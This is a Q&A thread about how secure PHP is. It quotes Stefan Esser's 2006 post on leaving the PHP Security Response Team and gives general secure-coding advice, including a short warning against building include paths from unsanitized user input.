How secure is PHP?

To quote RSnake from a sla.ckers.org post back in 2006:

I thought what was interesting is that Stefan Esser retired from the PHP incident response team. Not to start a religious war on the boards, but it's interesting that the founder of PHP's security response team is fed up with the lack of security in PHP and quit as a result. His site is down at the moment (traffic flood?): [blog.php-security.org] So here is a cut and paste of the cache:

Saturday, December 9. 2006

Last night I finally retired from the PHP Security Response Team, that was initially my idea a few years ago.

The reasons for this are many, but the most important one is that I have realised that any attempt to improve the security of PHP from the inside is futile. The PHP Group will jump into your boat as soon you try to blame PHP's security problems on the user but the moment you criticize the security of PHP itself you become persona non grata. I stopped counting the times I was called immoral traitor for disclosing security holes in PHP or for developing Suhosin.

For the ordinary PHP user this means that I will no longer hide the slow response time to security holes in my advisories. It will also mean that some of my advisories will come without patches available, because the PHP Security Response Team refused to fix them for months. It will also mean that there will be a lot more advisories about security holes in PHP.

Posted by Stefan Esser in PHP, Security at 10:58

Well, scary as that sounds, I am really excited to finally get the "real deal" on PHP security. I've always been a little wary of it and it will be interesting to see what Stefan has to say.

source: http://sla.ckers.org/forum/read.php?2,3976

Which introduces nicely the Hardened PHP project, Suhosin http://www.hardened-php.net/suhosin/ and Esser's Month of PHP Bugs project http://www.php-security.org/


Just like any other language, PHP code is as secure as the programmer writes it.

Also like any other language, individual (and even common) security risks are too numerous and detailed to include in a StackOverflow answer.

Find a book which covers Secure PHP coding.


Don't trust the user.

include "a/literal/file.php";

is quite safe

include $someFile;

means you want to think about how $someFile gets set. If you use any data that was given to you by a user to set $someFile's value, you'd better sanitize it.